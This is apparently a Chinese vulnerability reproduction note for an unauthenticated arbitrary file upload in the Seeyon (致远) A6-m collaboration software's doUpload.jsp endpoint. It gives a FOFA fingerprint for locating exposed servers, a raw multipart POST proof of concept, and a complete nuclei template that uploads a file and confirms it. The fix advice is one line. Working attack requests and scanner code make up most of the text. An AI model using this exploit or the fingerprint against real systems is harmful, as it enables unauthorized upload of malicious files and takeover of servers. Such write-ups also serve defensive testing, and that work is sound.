致远A6-m协同管理软件任意文件上传漏洞复现
1.漏洞介绍
致远A6-m协同管理软件doUpload.jsp接口存在任意文件上传漏洞,未授权的攻击者可以通过该漏洞上传恶意文件,从而控制服务器。
2.漏洞编号
CVE | CNVD | CNNVD |
---|---|---|
- | - | - |
3.影响范围
名称 | 版本号 |
---|---|
- |
4.检索特征
FOFA:icon_hash=“277494963”
5.POC
POST http://127.0.0.1/yyoa/portal/tools/doUpload.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Length: 219
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvI7BO1Qq69tqF3Fh
Cookie: JSESSIONID=1BDC1511726B24DF9B75FD554960F96A; JSESSIONID=0B4A41EA32B167EC5531DD0F78E4C10D
Origin: http://47.106.219.92:9090/
Accept-Encoding: gzip, deflate, br
------WebKitFormBoundaryvI7BO1Qq69tqF3Fh
Content-Disposition: form-data; name="myfile"; filename="cghn8mdjms.txt"
Content-Type: application/octet-stream
www.cnvd.org.cn
------WebKitFormBoundaryvI7BO1Qq69tqF3Fh--
https://x.x.x.x/yyoa/portal/upload/1709521517843.txt
nuclei脚本
id: seeyon-a6-m-doupload-fileupload
info:
name: 致远A6-m协同管理软件任意文件上传
author: hugh
severity: critical
description: 致远A6-m协同管理软件任意文件上传
reference:
- none
metadata:
verified: true
max-request: 2
fofa-query: 'icon_hash="277494963"'
tags: seeyon,oa,fileuplaod
variables:
filename: "{{to_lower(rand_base(10))}}"
boundary: "{{rand_base(16)}}"
http:
- raw:
- |
POST /yyoa/portal/tools/doUpload.jsp HTTP/1.1
Host: {{Hostname}}
Content-Length: 298
Origin: {{BaseURL}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{boundary}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: */*
Cookie: JSESSIONID=1BDC1511726B24DF9B75FD554960F96A; JSESSIONID=0B4A41EA32B167EC5531DD0F78E4C10D
Connection: close
------WebKitFormBoundary{{boundary}}
Content-Disposition: form-data; name="myfile"; filename="{{filename}}.txt"
Content-Type: application/octet-stream
www.cnvd.org.cn
------WebKitFormBoundary{{boundary}}--
- |
GET /yyoa/portal/upload/{{jspuploadfilename}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
extractors:
- type: regex
name: jspuploadfilename
part: body
group: 1
internal: true
regex:
- '(\d{13}\.txt)'
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code == 200 && contains((body_1), 'window.returnValue') && contains((body_2), 'www.cnvd.org.cn')"
6.修复建议
更新到最新版本